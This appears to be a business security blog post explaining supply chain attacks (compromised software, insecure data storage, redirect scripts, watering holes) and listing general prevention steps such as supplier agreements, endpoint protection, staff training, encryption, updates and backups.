What is a Supply Chain Attack?
The majority of growing businesses work with a variety of partners and third party vendors in various different ways. Exchanging large amounts of data with other partners (such as integrations and customer details) heightens the security risk. With supply chains, deliberate cyber attacks normally involving Malware can easily reach the businesses in the chain through a number of vulnerable access points.
Accenture the global management consultancy recently released a report that over half of cyber attacks are delivered in the form of a supply chain and claim that over 60% of cyber attacks originate from entities that are part of the extended supply chain, or by external parties exploiting security vulnerabilities within the chain itself.
It’s important to note that the security of a supply chain is only as strong as the weakest member of the chain, cyber criminals identify the vulnerabilities of the weakest member to gain access to the other members of the supply chain.
These are worrying statistics for UK businesses considering GDPR is now in play. With the GDPR, a Supply Chain Attack that results in a data security breach could mean businesses are liable to a fine of up to 4% of annual turnover.
How are supply chains attacked?
Supply Chain Attacks commonly occur from third party software providers, third party data storage, websites and watering holes which are all used to distribute Malware. We briefly explore each method below.
Third party software providers
Attacks occur through malicious Malware or counterfeit components embedded in to software stored in repositories that businesses regard as secure. The software is then downloaded by users which then installs both the software and malicious Malware within it. With the compromised software being very difficult to detect if it has been altered at the source there is little clues for security teams to suspect it’s not legitimate. This year, the Petya Ransomware outbreak hit businesses globally infecting millions of computers.
Third party data storage
Many businesses store their data with third party companies which aggregate store and process the data. Some data storage providers are not fully secure and can be targeted by cyber criminals where they have the potential to cause large scale fraud with other links of the supply chain.
Cyber criminals can easily access insecure websites and add redirect scripts sending visitors to a malicious domain where Malware is automatically downloaded. This could be the website of one of your third party providers, which would then infect your business if your staff or clients visit the site.
A watering hole Supply Chain Attack is where cyber criminals identify a website with high amounts of traffic eg. Government, finance, healthcare. Once hacked they use this website as a base to distribute Malware which can then infect that users device and other related networks.
Preventing a Supply Chain Attack
The more steps a business takes to improve their own security, the more secure supply chains will become. Here are a few things you can do to improve the security of your business and some considerations to ask your partners within supply chains. However, complex supply chains such as those in manufacturing require comprehensive risk management processes in place.
- Build Security declarations in to vendor and supplier agreements – Although these suppliers aren’t employees, you’re sharing important information and data with them and very often this is over email. While you may be able to trust your own security set up, can you rely on someone else’s? A data security policy should be part of a supplier agreement.
- Use endpoint protection for devices – ensure that staff are only using devices that have been checked and approved. Intercept X from Sophos offers full endpoint protection.
- Staff Awareness – Provide business cyber security training to all staff to ensure all employees understand and identify possible threats, additionally to train all staff not to keep passwords or private data stored in personal folders on their computers. Obtaining the Cyber Essentials Certification is a great way to get your business started.
- Encryption – Make sure all business hard drives are encrypted.
- Update – Ensure your businesses automatic updates are turned on to reduce the risk of running on an unsupported or out of date system that hold vulnerabilities.
- Back up – Ensure your business has a secure Disaster Recovery and Backup service in place as do your partners that have any access to your business data
Photo credits https://www.ncsc.gov.uk/